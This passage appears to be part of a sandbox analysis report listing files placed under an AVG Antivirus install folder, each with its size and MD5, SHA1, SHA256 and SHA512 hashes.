                                                                                      6e71a2e05b8505636613d43ecb7fae2de86364ad04f619005c12e53ac8c8c33c3489af3606e0640bc4e03c89a7a1e7d900fd6c1c92019c44ddf8d55e161c8f17

                                                                                    • C:\Program Files\AVG\Antivirus\aswDld.dll

                                                                                      Filesize

                                                                                      140KB

                                                                                      MD5

                                                                                      1402eee130aa9f0608416e3f8f5e27e2

                                                                                      SHA1

                                                                                      7bcc0c9a13e38145fe0b0d1d6e90283f43c4ce22

                                                                                      SHA256

                                                                                      fb3bdc34052935083ffb536becc8c22741c51f68687315bc459c7597743bda51

                                                                                      SHA512

                                                                                      b5bdedeefd9dc733c180e0569835dbab0a59cb36431b8372b3ab4165614e7876543cd51d276c885d945301dd39221b011b5e2ee43dae1ac437b1e41939b0fccd

                                                                                    • C:\Program Files\AVG\Antivirus\aswEngLdr.dll

                                                                                      Filesize

                                                                                      684KB

                                                                                      MD5

                                                                                      7ed3b467ae8dde5a89de6f53dd2c6cd5

                                                                                      SHA1

                                                                                      56d0903502b645c46ce95d0d528dbacbd8a11264

                                                                                      SHA256

                                                                                      eccb01d3698d3d700a0c1d7a7cb0e95a6b340709589ae22f882a162391289b14

                                                                                      SHA512

                                                                                      5495d27c6e36e19c3186205c229125beefba83cb16c04babab86778cf0f8f65bdf91bf14cb69995bc30913a3e6f55c918bca4f3d150501e506b6afa83d666329

                                                                                    • C:\Program Files\AVG\Antivirus\aswEngSrv.exe

                                                                                      Filesize

                                                                                      674KB

                                                                                      MD5

                                                                                      aaea5b4a9fba83f3d7de18aeeee7f593

                                                                                      SHA1

                                                                                      571fd1014e97334a2c831ad035a86cf57dd60a52

                                                                                      SHA256

                                                                                      afc75b992ee731854b3ee5d6b6ab1215b51eb063a7c57a396983f7d21f7ccd5d

                                                                                      SHA512

                                                                                      4b21415e79afa93c86b9d180fad8713150b608d1ae38f8661be86de0d070d867a3854d99b308efff37c7377816a25a806a9c2277878ef13cddf5f61c648ca035

                                                                                    • C:\Program Files\AVG\Antivirus\aswIP.dll

                                                                                      Filesize

                                                                                      376KB

                                                                                      MD5

                                                                                      9b422f9745b67bb6ff2ccfe620a1f924

                                                                                      SHA1

                                                                                      1a6b34cad226c9107c9aaf31721e50498e22ffe9

                                                                                      SHA256

                                                                                      6046a48e5443d43f6aef421c0ad80f74f279dbcbb255426a7934b47223d30cdb

                                                                                      SHA512

                                                                                      7d1d2e4a45b131ee14337b4328c8377d61cbe3f500909db5c38dd1dcb198592cc870fb3e3643aacaacfa85fa422f38f7f554bfc0bfff94bd14a4ca1b8bd870f8

                                                                                    • C:\Program Files\AVG\Antivirus\aswLog.dll

                                                                                      Filesize

                                                                                      863KB

                                                                                      MD5

                                                                                      d3a53aad07cdd0acb3872a269295cba7

                                                                                      SHA1

                                                                                      d5b0e76122914ce554590695adb2c65cb31ef0ab

                                                                                      SHA256

                                                                                      e647e397014a9abd347d234ddd4a653b43b75369d99f62bf3bf02ee8c41c26aa

                                                                                      SHA512

                                                                                      6e1f7012675212bb10d42ea2c818e87b759d36722fde22f860d10fff445b9af9d2cf2a8139ca0da785672c982123691481d9c1749cfff2b9feb877d1b2f8ef20

                                                                                    • C:\Program Files\AVG\Antivirus\aswProperty.dll

                                                                                      Filesize

                                                                                      1.4MB

                                                                                      MD5

                                                                                      807a46593a81af615fae7bb37a2e739a

                                                                                      SHA1

                                                                                      36dfb629cf52d4e50b67e118be0a2bd6390e51cf

                                                                                      SHA256

                                                                                      e184d47fea4e2f0ee4be749fe13e842a7cb2760412b98c6be5fecf439a393aec

                                                                                      SHA512

                                                                                      4e0cce4bfa3dba1346739c37d562c486565d2fc940bdbccbe1be6004ad2cc525d4667e04f75296dc7808481e56d4f8510f59b20000eaecb506ac72aa25470a5b

                                                                                    • C:\Program Files\AVG\Antivirus\aswPropertyAv.dll

                                                                                      Filesize

                                                                                      1.1MB

                                                                                      MD5

                                                                                      2492cf53363959b58c0d5f373b436e98

                                                                                      SHA1

                                                                                      020dcc6a607d76a8347975cfcc70fc6c3907f527

                                                                                      SHA256

                                                                                      55df6bb7ec9e7d03df299f1001b85e9babbdcef96a454897b0bd04743080b1cd

                                                                                      SHA512

                                                                                      f910a09b494ae4ca3e031da4d2bf55d38ed2445a37600f88702617d954adffc6024c0cb20f7168a8b15edbfef83b6e7b35edf0794e7e3a9785ddeddb637b58f6

                                                                                    • C:\Program Files\AVG\Antivirus\aswRunDll.exe

                                                                                      Filesize

                                                                                      3.9MB

                                                                                      MD5

                                                                                      87d2b9e2b99278107bb6ae28b780f151

                                                                                      SHA1

                                                                                      9b0596b260d596912965b3693ee1cf6205a577d7

                                                                                      SHA256

                                                                                      dec8bbbc1bb59647c0b9d770a83d9feaf1f486c32c10849af28dd9d0b31ee143

                                                                                      SHA512

                                                                                      d931001736798a3fce9eef4241af37308cc246739c1a3be5bbb878e8aa6148ab51760bb8ce59cdfa6a0b0b051593adc51ea8e1835afd5fad83da418ada3498c2

                                                                                    • C:\Program Files\AVG\Antivirus\aswRvrt.dll

                                                                                      Filesize

                                                                                      284KB

                                                                                      MD5

                                                                                      8c14969a44922866e8675d20f8e7d030

                                                                                      SHA1

                                                                                      6bcdb7a1fc13c132fa20fc48bbff245993552d81

                                                                                      SHA256

                                                                                      3ab86edd71305a765d937db39af400ddc4ae1cdeacd9aa81d6b50beff8279822

                                                                                      SHA512

                                                                                      2eb6f99001580904454e6ce9a416931a4a3af2791275b0892a26dfeaaa49aef45a916cdbeda95154388c46d7e80f72ce58839273988a65879799a61bf2d1c654

                                                                                    • C:\Program Files\AVG\Antivirus\aswSqLt.dll

                                                                                      Filesize

                                                                                      1018KB

                                                                                      MD5

                                                                                      8736f5badef43a68219113cc12d69fb2

                                                                                      SHA1

                                                                                      c8c4e862f49a67b67a88e75ac529c496f61a0e3c

                                                                                      SHA256

                                                                                      ce33d520f0f8b85f26757b8c791d31b513f94756c3b52f2e498bd3836f466386

                                                                                      SHA512

                                                                                      c5e9e81f09c88015886a97c0db3c4297fd9812d4680dca824e8251d6c60086b846ffc2714fe94042f97e9a6a2492a8e078e13bbd233fbd3b2546bfd8b5d821e2

                                                                                    • C:\Program Files\AVG\Antivirus\aswVmm.dll

                                                                                      Filesize

                                                                                      257KB

                                                                                      MD5

                                                                                      dd2f4a4260ba78a5d3a509befb98a5b3

                                                                                      SHA1

                                                                                      45ff333d596ecff020241c1d5c9a297552914d63

                                                                                      SHA256

                                                                                      2e3bf0a59900b13359416c7780f58bced0446b7489c5ea94d92c414251574d97

                                                                                      SHA512

                                                                                      a10104a7cf9d278f00da510c174357889e2ff91343ac66fac2b3dbb22051b01d15319939b70964ed6ad5276619d839042a78d395f819e5006bd437b9947dac1e

                                                                                    • C:\Program Files\AVG\Antivirus\aswW8ntf.dll

                                                                                      Filesize

                                                                                      611KB

                                                                                      MD5

                                                                                      6bba9e895f519663df47a6869713da39

                                                                                      SHA1

                                                                                      92cc2af3da71f9140c9c982363b6edbb5f122f50

                                                                                      SHA256

                                                                                      abb95b635fac686fc8fb1e36e1bd9dd0474a1ac75f9984a3d9dbaa35dde1452d

                                                                                      SHA512

                                                                                      90a3c728b32b58dd0854897efc0f48c33fe9d20645c2fe63fc18c1659d662b779769fa5de058944c2cfd3b745509515d9a65ea4d5694e2a66a8a0dd61b7ed21f

                                                                                    • C:\Program Files\AVG\Antivirus\aswavdetection.dll

                                                                                      Filesize

                                                                                      1.6MB

                                                                                      MD5

                                                                                      effed1b3d171d1ee96320ec4edc443fd

                                                                                      SHA1

                                                                                      42bd7b0cef3f75d4a114b3a6d3986d2bdf42e740

                                                                                      SHA256

                                                                                      bd41ba0fd5bd56f8b15bcbbe762b0b4a13221b3032f6204316e5a8254694ea2c

                                                                                      SHA512

                                                                                      1c16fd330f7f6cd7a155c61d7b302f8d318aa5f3d15aeeaef49430d57f3dd07067cc2ea5b1ac73992a1202b2b1e9495cc2ff6b5ff13a5c8e6710dca5d14e514c

                                                                                    • C:\Program Files\AVG\Antivirus\aswcomm.dll

                                                                                      Filesize

                                                                                      837KB

                                                                                      MD5

                                                                                      79b7971d9b924c9722b1ad388ebdd080

                                                                                      SHA1

                                                                                      b1e41de37b4ed87c52b470d1e22c19ec433cbba6

                                                                                      SHA256

                                                                                      e50aa91396d54a42d9ba3d53a51241955f51b65d8d61f75eb30e54ce5a84eda4

                                                                                      SHA512

                                                                                      49780b6c21bb66863e85bc3803c1b1087061e32a789479ad631a06ad0de4707025ee93a6d57c4a3410e066f6482b1d4727c5de842036e857d50f06496a92c606

                                                                                    • C:\Program Files\AVG\Antivirus\aswdetallocator.dll

                                                                                      Filesize

                                                                                      181KB

                                                                                      MD5

                                                                                      6706e8f6646f5c50cc9d3fe5818f5fde

                                                                                      SHA1

                                                                                      4ac207c0baaae464cd27e539069b68a2ed277eba

                                                                                      SHA256

                                                                                      c471d8b5c352706a5669e9ab2043fb20dec3ba6f923fd42a7d58f55b7b3e226e

                                                                                      SHA512

                                                                                      d78e52381eac9e3c4c58265fef8489d54d9b936bc50800ffd762c928fcf3459f956e9e41ec87b5ec62ec3d740c182f1d15c9541384309cd8cc5f8003e9c64d70

                                                                                    • C:\Program Files\AVG\Antivirus\aswhook.dll

                                                                                      Filesize

                                                                                      90KB

                                                                                      MD5

                                                                                      0b6b066ebcff631bc2e3cc9dcb022ed8

                                                                                      SHA1

                                                                                      654f8f2772dd7326e0b5a3b858feb68f896585c3

                                                                                      SHA256

                                                                                      3b9757e4774cefbf71aec3a399a7b8e6617bebd9f3c1b03e83b8f7221774b72b

                                                                                      SHA512

                                                                                      a43671194af3c2484248865b53395920dd2a2e6e6ec8af6e5358c912027bc21304ee4353298f009c3a28046bf2431a61ee20c59e2696e60483fdd247b56f2586

                                                                                    • C:\Program Files\AVG\Antivirus\aswidpm.dll

                                                                                      Filesize

                                                                                      829KB

                                                                                      MD5

                                                                                      99d620e2a26569141b89161c601a8795

                                                                                      SHA1

                                                                                      7630543e608de5bbcf33a59e9cd7642b815b4e20

                                                                                      SHA256

                                                                                      6219245d0e5c97d48dac294c934dcda23fd50f89d60dda2b4b9c71be96674d13

                                                                                      SHA512

                                                                                      ccd425f694a2a09bc9c1298740edcba98e993a08799a7cc12279211efa4d0275dab2853a51310fe2b8d0b81d6bef11c8cd7f1e4293ded28ad1b713753e8a062f

                                                                                    • C:\Program Files\AVG\Antivirus\aswidsagent.exe

                                                                                      Filesize

                                                                                      8.7MB

                                                                                      MD5

                                                                                      41e889256f96b8109c64fbc1ea2ef7d1

                                                                                      SHA1

                                                                                      8709d450fdbcd74772cc6f05d2021f620abfb4c7

                                                                                      SHA256

                                                                                      919b4dcbcf3b4640c9773505dcbb769de2a29e8492534ee954f5de98c0e955db

                                                                                      SHA512

                                                                                      6561913958fd5a37d6ff97539ecc59ae48ff00023009894bbd62e0bdf40917cb0d4a51e7c4b691fc668b7858f4c87a1f6156128a377dc4263776f371ae5521e4

                                                                                    • C:\Program Files\AVG\Antivirus\aswntsqlite.dll

                                                                                      Filesize

                                                                                      878KB

                                                                                      MD5

                                                                                      1e3cf16cb4e8870eebee596fa930f504

                                                                                      SHA1

                                                                                      57a4568a52d310f972df493ac92ab7525dc62ba0

                                                                                      SHA256

                                                                                      74bef3360ccd8e4885d3fe6ce457e4eb14e3fbbb2977876a0af9fb80bf4b51fb

                                                                                      SHA512

                                                                                      47819f71276b9e2b890976fd6d8367936782e03dcea41d0799cd87180f0b8ca630da9d9e6f881c6d5e9e3ebb574d60988c0c362537b3209ea0c7831b2f42a1d7

                                                                                    • C:\Program Files\AVG\Antivirus\aswpsic.dll

                                                                                      Filesize

                                                                                      471KB

                                                                                      MD5

                                                                                      3126f2500e6d978be5fa7341fbf414ee

                                                                                      SHA1

                                                                                      aa83f080b2f9eaf06e178215119f33d51689414f

                                                                                      SHA256

                                                                                      eab115fc1949d867fbfd698e9ce6c39743b1a6ecaf6397b0266f5d11cd2a8dda

                                                                                      SHA512

                                                                                      b94088c822399f81501392907b46f18eb2d1102de14e7614322f9d054abe4c8217128bc84d423d418fdcb9bc1de7e6e5d1525a31ad595195df27323b4a33d407

                                                                                    • C:\Program Files\AVG\Antivirus\aswremoval.dll

                                                                                      Filesize

                                                                                      3.1MB

                                                                                      MD5

                                                                                      e7a89396db0fca3dc1f0549a909a7870

                                                                                      SHA1

                                                                                      9744293073f133ea461e2113230a890c17ddce57

                                                                                      SHA256

                                                                                      9fd707ffe350eee91d4641cfa5f6759f921992d9f32ef5f1b3d6f3f2841cbdeb

                                                                                      SHA512

                                                                                      52b04da24418c93fe62f71588b2b70969b28bde27cddfea908aad504a196e843e56f897a8daf88899580e33216d7e717d63ae551ff7c751c990e9d2e3c9a59ab

                                                                                    • C:\Program Files\AVG\Antivirus\aswsecapi.dll

                                                                                      Filesize

                                                                                      1.8MB

                                                                                      MD5

                                                                                      5984ca2a2f59a68ad19743104dd0a9ef

                                                                                      SHA1

                                                                                      3d7c3be98bb2c9958e84bf9a9ab84156e9f85c5d

                                                                                      SHA256

                                                                                      96998a73862dfbaa413b5bae9543cb9aa4abcb960d619855046f4167bd0aa51e

                                                                                      SHA512

                                                                                      4c3360fbcc24c62bbc045891cf74f83b764310dd969eea09af6ec6feef99d01ffcd09df58bc2612d54c46ad2bd01b27f9ea93eb6ea64342c680d79dc28b0dbb9

                                                                                    • C:\Program Files\AVG\Antivirus\aswwinamapi.dll

                                                                                      Filesize

                                                                                      121KB

                                                                                      MD5

                                                                                      f12dc9f155235d058619a511eb33f8e9

                                                                                      SHA1

                                                                                      8a01c80b7c8f3aa59e981aedd69c1a2980b0f59f

                                                                                      SHA256

                                                                                      46324818eb6fff57418f1ec84189a541e9844f9d4cf9f39fe8a4d51b387d9289

                                                                                      SHA512

                                                                                      432a34ed846c12b72d43f0dd7dd5aeb2b8a3d94b57ef92554c3fa8d93ab7809bdf49af0f2153f09948176fe6be4e52d7577b0e3bf85449f6a03a117ab5109cc7

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-console-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      0909e61c8c9c717976828f65c987e5f9

                                                                                      SHA1

                                                                                      b5affabb8afda55ebb1f404edab69c6c239affe6

                                                                                      SHA256

                                                                                      03ffdb036329a25beacf905d62611a13e3dfdda6cbd2d13af830258e8cf40ec0

                                                                                      SHA512

                                                                                      7f78746e40da64631c08d0e173fbdeb40beed180932b42382d9f3ac0cdb4348d2a5b1c29770bb98f5d4823cfd66ecac2285afbcaf109f82c8b75c7711f10c49d

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-console-l1-2-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      6b33e6f1d77cec0901ea8e91473bc18b

                                                                                      SHA1

                                                                                      a397d2c6aead0b3e57d413a8d4af7f28e67f4166

                                                                                      SHA256

                                                                                      449631a3f5fadef72acc2c2f84765208d0ca014ec1fe93fb9ad805eec1d40eae

                                                                                      SHA512

                                                                                      8f5214e38202719f6a7549b2b97ad24288974cfb6cf0da1e9eec5b3b2092220f2330a260b17e28afa90b90226666a765a4e64fe91107e2063cde8e285f64773b

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-datetime-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      2b4a3a51e075ab9819c6d6bc40efb4b5

                                                                                      SHA1

                                                                                      bc52c10ded8b087c73229dc2f98714b5a368f521

                                                                                      SHA256

                                                                                      d718e1b6c352112c2f8e36b4ba5ed28e6179257fd2fe944c4a0d404b5c15b5ae

                                                                                      SHA512

                                                                                      13b07dc2247d51dad1ab9bc7df93e0d3e1bd6cc4fd16f9aff87ceffd40a56933d569a5fb82177dea7b6ea04ebf9f909f95451d123126155a13de6a85f747c592

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-debug-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      607703b245d9b4fc69a8b5363ff626fa

                                                                                      SHA1

                                                                                      dcf4626787ea220b19e08cc5bf9e55553a3a2aef

                                                                                      SHA256

                                                                                      f65b1b3ea2767f98f0c29118e85b06f4e61654bec34b60b3abb593b24ec29af4

                                                                                      SHA512

                                                                                      92d761f733f2c678946894ca72459b0e6dc62cd3abe1073653104689ab48c19603e6e1109c07b2f110822b424430f22d112f87c629b99d0b3ccc16e179549628

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      059129bae1776f03c59d3ba66a6f6dee

                                                                                      SHA1

                                                                                      33b1dbcaba1d16eaf5413f1378119cecc1298724

                                                                                      SHA256

                                                                                      a83af0f79abb5e5c818c6f38a38da80e531081f3255cb006ed4c29635cc0b9ce

                                                                                      SHA512

                                                                                      6a7da7e58620bc1ce4b6d3cab1e0b746fc9fcf05a84d85931f845412301880786fbc63b31611d9442b5a1cfa72558966375ef14edc749473e2b7c988dd20b675

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-fibers-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      9fa3992f5dac5ea5dfa15b9669c68154

                                                                                      SHA1

                                                                                      a453fb6c4064da8c01ad03a4ea3c0434efe82635

                                                                                      SHA256

                                                                                      9057131f628e547c14754d545140ad6544e64606358104da50841e9a1b03f442

                                                                                      SHA512

                                                                                      ad73f3952dda55cfaa6a0d6a0233df785650f5965caa4859b6c1577e3fbd6020e60b4b26338387690cc48b16a186d2b530708a71d2671ab17ee8904399de292f

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-file-l1-1-0.dll

                                                                                      Filesize

                                                                                      25KB

                                                                                      MD5

                                                                                      817f9a76b7eadc1226b006ccbdd38a11

                                                                                      SHA1

                                                                                      8b81897cdd4d48befa389c1df2d0b887ffeb58cb

                                                                                      SHA256

                                                                                      99ed148ffbb35829480412dc64da6ad24dfabe2f9a0eff9ba1493455d7127677

                                                                                      SHA512

                                                                                      53d8b2561862c6b2465665d761612aaa8b7adc887058260fbf970aac0fb006317283ada01468b1e042fd9dd44def90451793afee297ed787086645cebce45cd2

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-file-l1-2-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      e334f2fe1e0e6d5d6966f139ed328d97

                                                                                      SHA1

                                                                                      68b2cd826f3dfa59531397ebb3f382dec9af5fe5

                                                                                      SHA256

                                                                                      d56eae93c55abdc8eb77d132777049634e28a9b59fd4b2101d51351546b984d1

                                                                                      SHA512

                                                                                      fb6ee02f06447c906a4353d93ce247e14a9a1ea4255819a88e395afe2e3775fe3aeb622b7a97d86086d88c739ba4d2e2fba9e8fd6467e167fc75d595c9182327

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-file-l2-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      7f0ef1cf592d04b082b65f75584652cd

                                                                                      SHA1

                                                                                      f7b9a2851a66a6a8eb509f2541b6ccc3b551f2fa

                                                                                      SHA256

                                                                                      9f496e181b1c862c7a7d03c09d9b0a5361535c98acbb1a9d50a27bcfb0a2bcc5

                                                                                      SHA512

                                                                                      30d2d695773e7bfd67de8691c40e571b3b91858e72eab3d78c84902b359108e9988247bf81689ab15fef6ed0a9ef62031f1937c6e7ce4ce8e1a34970ba23e727

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-handle-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      1902b85a588178857e9637902e5a1b85

                                                                                      SHA1

                                                                                      31ae4cf76a34ccbd92fdbe60bee080998741ef4d

                                                                                      SHA256

                                                                                      5e48c99dd6318b017686bde507cdcb9d6ecf25f4f78f345845b865e443f1ee66

                                                                                      SHA512

                                                                                      0755e9c0adc9e374060c851d4f7fa62633ec07dde0bbfd56ffc9bc8ecff5b9efd6fa8418c43e838770eed43a54a48fd61a41226d9ea84834275a4a36c7796472

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-heap-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      892e47390f34aac7d20afe63ffa92f20

                                                                                      SHA1

                                                                                      4a78a77ae1d5bdba55534167f781a3c8675c7ed3

                                                                                      SHA256

                                                                                      6070ffb5e20ed032d460d323df981d369fa68045fab130fd100803a00ab88c23

                                                                                      SHA512

                                                                                      8b37866ebdca5047673d984bd779b1df052e3d44e3fabc3a4ce2e747489baa2bd86add629d95c76cf08150f74281d89d46372ef64266b90304cf7dd581af3a93

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      d8999e328af5ee1eb23c216336637cb7

                                                                                      SHA1

                                                                                      a7bde6c833e4d6ddefcc4050997b1583ff1ffa42

                                                                                      SHA256

                                                                                      4ea02b683513a157e21824b1c1e9ebb782d22f14209b67961f97b1f79673d3ed

                                                                                      SHA512

                                                                                      4f041ed2daf781b7f86b4459e74330650b2687ee46dfb961ed7a0716ac7ad2082a631cb619cc6d3c7d19f550bc030553b9656aeba14f969dd52df0b40a0e418f

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      6337654372aa9adf6a8fc97d9676a33d

                                                                                      SHA1

                                                                                      b790f4828e7aa18cd0eae77e78c67ddd66f3ec5e

                                                                                      SHA256

                                                                                      6fc551cfbcaa0f90ed24dd09fa117e9fb3b6755a3fc0251d33ca64862a9a3414

                                                                                      SHA512

                                                                                      4a888d71747c64cb4a964d8df956c5ed9e3de9e8cf30d804e3ba76e8c35502e1802423ce527a419935b0d8c8e4c0f6168657b2734ab79d01afc946521a88d528

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-localization-l1-2-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      d4bad006e413ace7d729b1249c49b92f

                                                                                      SHA1

                                                                                      cf0dff1b371316c8517619fdeff81c583268bad3

                                                                                      SHA256

                                                                                      245d48bfce5cf6e9c5093e995d6ab5988e2401d32530fd6863bd5f8fd688d780

                                                                                      SHA512

                                                                                      d1a5001633f1cce60db2687da28706f66644613672fa8487b065e3aa8d77ddcc96d9272c665d894b243e222e1c104be10be1dff8e5d007490e50f2bd2a708d0f

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-memory-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      714e850aa29e808568933c5ed8c7df5a

                                                                                      SHA1

                                                                                      ad84833bcac69b5217705e1c4d33d54c856525e1

                                                                                      SHA256

                                                                                      4a244eea4596ebde0f9094cc6dfeeb5abb3c4385225bb0630ef55a431fe1c4f2

                                                                                      SHA512

                                                                                      3a220ad4e2fd49f40f7fe5fdfc53608b114661f31993c0329e993c5d733b6d6f3a366eb46f93aaa9d5cad90766b21d85e5ccd09cb9c5ab905118d70702a3ed11

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      9ad2e67f2b1f04b760deb00b889fab53

                                                                                      SHA1

                                                                                      465314c9bdd359840f7da11a619ad0b409c271d8

                                                                                      SHA256

                                                                                      5662035361e37f6c5e4a5a19de134df2ec20bd4c0f1be803203b37c95ee61265

                                                                                      SHA512

                                                                                      cdb358848d48cd3913e7249eaa45470bee4ba9f9d92d975215018477a57db930c16b349541da2d82a2f9131220ec3b3cf9ff471ca411c2f705bfe916e8736be5

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      772d6c07e47e77a4479c7a9eccfeac4d

                                                                                      SHA1

                                                                                      b88db71fc80eb57182db6dc6ac00b022e1e47cb3

                                                                                      SHA256

                                                                                      2c9a8f8d47b49d04a82e8e689ae9f6552482b1861eb8398f3733e97327191c2a

                                                                                      SHA512

                                                                                      f87bb803e818372f57319af97227834673cce9988c81ffd4a3d1c6d7038c6f7398e06a7133a17f063cae152ad27666a6d18f87ed77bb46dbe141c1272bc3ac84

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      9ac788a87032640e046f305413585503

                                                                                      SHA1

                                                                                      41b74cecf0f78134204dd3d8aaddfae34d6aacbb

                                                                                      SHA256

                                                                                      363825adb27d5a5bd249fe58460a977077f823e50dac7509e124fcbac1512128

                                                                                      SHA512

                                                                                      cc725796af3f7793ce6e6faa96a201ebf5e77ed00dfac3211a66a95ee071e559c9efb8e47ae0287d9cc1feded559000a582a2138736ab8c628325428c78e648c

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      31f60bf9a22a86cb8879fce5c1022254

                                                                                      SHA1

                                                                                      23cdaa4d6ae0e953d083b968558a2af49bf95a4f

                                                                                      SHA256

                                                                                      53afac76a7124a132a7c11261f3b6ba8d6a5466e7e8f683c8d12ac370b7d6b62

                                                                                      SHA512

                                                                                      c41ebb39cc0939b38d788b692e75c10c78a806cc8844d8526ff25869777eefd086518cfd817ebb700e20b3937401d6c0f7f506bcd479fafe1b801507376f4ba6

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-profile-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      948e3c479e87ad905a3689bc94cbf86b

                                                                                      SHA1

                                                                                      c9b2dcc45feb9b0bcd52122b51adf98d7fa5b0e5

                                                                                      SHA256

                                                                                      982fcc32d7614cb921cc5203970e3997a33b31aa1d91f14db5db25a582dcc3af

                                                                                      SHA512

                                                                                      6f15478ba5e7b403580b4b52924866e52adcd112d82900dd17a2ce67efa10306a5a86e1ba5cab76bbe3577e2497b83adafd6cf6c39a81c35b53b528e8bf6b440

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      57745a06849d90cd5c79ccbec559e7b5

                                                                                      SHA1

                                                                                      71d3d3c0998e648ef6b061f7c65850c6a2a8593e

                                                                                      SHA256

                                                                                      890dbb72c4c35266bd658c663c1242cfa3b50cf51e2873e986b7ab2e055af4a4

                                                                                      SHA512

                                                                                      ca28053575e40eb805f366a7363257b3d40a6fa8ef46ffb5b58ff17cfb0ea2668f5cdf2661355e94866b73b914950c09940f5c32fef5f9a22439932e35391dca

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-string-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      1862f49d5c2ba7c2bbc78bc517cb0b38

                                                                                      SHA1

                                                                                      dbdca39d6d9d166f9cb5b8855d456653419136c2

                                                                                      SHA256

                                                                                      90ba9da43d6705d76905e630505bd1fd097d1899c9bca3241ad0de5ab08ee366

                                                                                      SHA512

                                                                                      c9c85ec2851f5b793de07e672365e6db28f1150ed6b6057d15be828a36029f4ba9e0d4cce12c7d424da4c94713c18ae256d9ecba9e59ab88af639adf56ed6a3b

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-synch-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      afc4db1ae7eb74d1b43eda3d7ea5b43c

                                                                                      SHA1

                                                                                      f31b2c1161024ec2f89c72631631e11fd5ceac60

                                                                                      SHA256

                                                                                      fb4b382e2dfa80b3427a98c51d3270b1e80b5c2a10fdae1a72b7c464e57fc6a7

                                                                                      SHA512

                                                                                      a014e4bbe207fd707a87aaa0228241fa7c414062af8922f51e46210b958284096357b21f89e59141fef28039a999dc6ac832ec7fc38bc4895e88fbed6b9a45a0

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-synch-l1-2-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      5dedf9f86ba1366d9e920f33eb03721c

                                                                                      SHA1

                                                                                      605312ce6d623889a1d404354ee653414a7e4920

                                                                                      SHA256

                                                                                      0ced53f1ac2adc9525047d2c2a7592300dc48a5f52ad8b740ce22e3f3aad85ff

                                                                                      SHA512

                                                                                      bed8c7a74e57f4cd44bd0edbc1bbb1f528ce261d7ad6a5545c33974c223ba910d648f0cbea8bf0736deb5aedd3b257f373cbbc4f9765d12c56a78e823d05d4b0

                                                                                    • C:\Program Files\AVG\Antivirus\avg.local_vc142.crt\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                      Filesize

                                                                                      21KB

                                                                                      MD5

                                                                                      177009944ea3860b58c09da1871db999

                                                                                      SHA1

                                                                                      01cf9cab3aec3a1ea89111269f8cb036e73916d6

                                                                                      SHA256

